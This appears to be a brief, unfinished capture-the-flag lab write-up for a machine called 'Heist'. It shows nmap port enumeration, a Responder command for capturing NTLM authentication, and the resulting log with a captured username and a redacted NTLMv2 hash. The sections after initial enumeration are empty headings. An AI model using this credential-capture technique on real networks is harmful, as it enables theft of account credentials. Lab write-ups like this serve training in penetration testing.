Heist
Enumeration
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-title: Super Secure Web Browser# cd /usr/share/responder
# python3 Responder.py -I tun0 --lm -v[HTTP] Sending NTLM authentication request to 192.168.147.165
[HTTP] GET request from: 192.168.147.165 URL: /
[HTTP] Host : 192.168.49.147
[HTTP] NTLMv2 Client : 192.168.147.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:[REDACTED]Initial Access
Lateral Movement
PrivEsc
Last updated